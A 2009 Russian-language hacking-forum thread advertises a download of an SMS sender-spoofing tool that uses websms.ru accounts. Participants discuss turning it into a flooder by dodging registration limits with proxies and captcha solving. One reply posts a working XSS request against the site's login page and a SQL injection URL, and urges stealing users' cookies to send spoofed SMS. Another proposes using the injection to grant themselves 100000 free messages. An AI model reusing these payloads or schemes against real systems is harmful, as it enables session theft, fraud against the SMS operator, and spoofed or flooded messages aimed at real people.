[WebSMSSENDER] СМС с подменой номера

Discussion in 'Уязвимости' started by cylaaaan, 24 Feb 2009.

  1. cylaaaan

    cylaaaan Elder - Старейшина

    Joined:
    31 Aug 2006
    Messages:
    0
    Likes Received:
    44
    Reputations:
    8
    Программа для отправки СМС с подменой номера

    Версия: 2.1

    Использует аккаунты websms.ru
    в виде:
    login:pass

    На сайте можно зарегистрировать аккаунт на 5 смс, без подмены номера.
    Если написать регер, то будет хороший флудер.

    [​IMG]

    Скачать:
    http://depositfiles.com/ru/files/2qhj26wap
    270кб
     
  2. *eXe*

    *eXe* Banned

    Joined:
    20 May 2008
    Messages:
    0
    Likes Received:
    184
    Reputations:
    0
    так с подменой или без подмены
     
  3. cylaaaan

    cylaaaan Elder - Старейшина

    Joined:
    31 Aug 2006
    Messages:
    0
    Likes Received:
    44
    Reputations:
    8
    Платные акки - с подменой
    Тестовые - без подмены (пишет - WEBSMS.RU)
     
  4. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    557
    Likes Received:
    306
    Reputations:
    27
    websms.ru - это значит три русских опсоса Beeline,МТС,Мегафон.
     
    1 person likes this.
  5. Gaus

    Gaus Member

    Joined:
    8 Feb 2009
    Messages:
    136
    Likes Received:
    36
    Reputations:
    3
    Там рега 1акк с одного ИП в час
     
  6. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    значит с проксями)
     
    _________________________
  7. mrTUZ

    mrTUZ Active Member

    Joined:
    17 May 2008
    Messages:
    63
    Likes Received:
    155
    Reputations:
    5
    Перезалей плиз. У меня с депозита не качает ;)
     
  8. desTiny

    desTiny Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    1,006
    Likes Received:
    444
    Reputations:
    94
    а про кликатель забыли?
    http://www.clickatell.com/
    в частности
    http://www.clickatell.com/products/messenger_pro.php
     
    1 person likes this.
  9. cremator (c)

    cremator (c) Elder - Старейшина

    Joined:
    20 Jun 2008
    Messages:
    258
    Likes Received:
    72
    Reputations:
    0
    Капчу как у них распознать не лечге как на WebMoney.. Только если слать на анти-капчу
     
    1 person likes this.
  10. TreV@N

    TreV@N Elder - Старейшина

    Joined:
    14 Jul 2008
    Messages:
    135
    Likes Received:
    48
    Reputations:
    19
    Нашол XSS.Куки у кого нибуть своруете и отпровляйте смс с подменой номера.

    HTML:
    POST http://websms.ru:80/login.asp HTTP/1.0
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
    Host: websms.ru
    Content-Length: 112
    Cookie: ASPSESSIONIDSATBBARR=HGLKKOKAMEMAAHADHJMFGPNJ;websms0=WindBook=0&Shema=0;__utma=177195445.3406579783414500300.1236403094.1236403094.1236403094.1;__utmb=177195445.0.10.1236403094;__utmc=177195445;__utmz=177195445.1236403094.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
    Connection: Close
    Pragma: no-cache
    
    AvtoLogin=1>"><ScRiPt%20%0a%0d>alert()%3B</ScRiPt>&Login=TreV@N&Pass=&Cook=on&reg=%C2%D5%CE%C4
    SQL injection

    HTML:
    http://websms.ru/avtosms.asp?Day=0&Month=1&Year='
     
    #10 TreV@N, 7 Mar 2009
    Last edited: 7 Mar 2009
    1 person likes this.
  11. heks

    heks Banned

    Joined:
    24 Aug 2007
    Messages:
    713
    Likes Received:
    95
    Reputations:
    12
    кто нибудь раскрутил дальше?
     
  12. a1ex

    a1ex Banned

    Joined:
    11 Oct 2006
    Messages:
    517
    Likes Received:
    130
    Reputations:
    -13
    Delete.
     
  13. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Спамер напишу потом я)
     
    2 people like this.
  14. Mixon

    Mixon Elder - Старейшина

    Joined:
    12 Mar 2008
    Messages:
    394
    Likes Received:
    119
    Reputations:
    12
    Ну есле есть SQL injection как Треван написал,то тогда мона бы себе поставить 100000 с подменой и норм...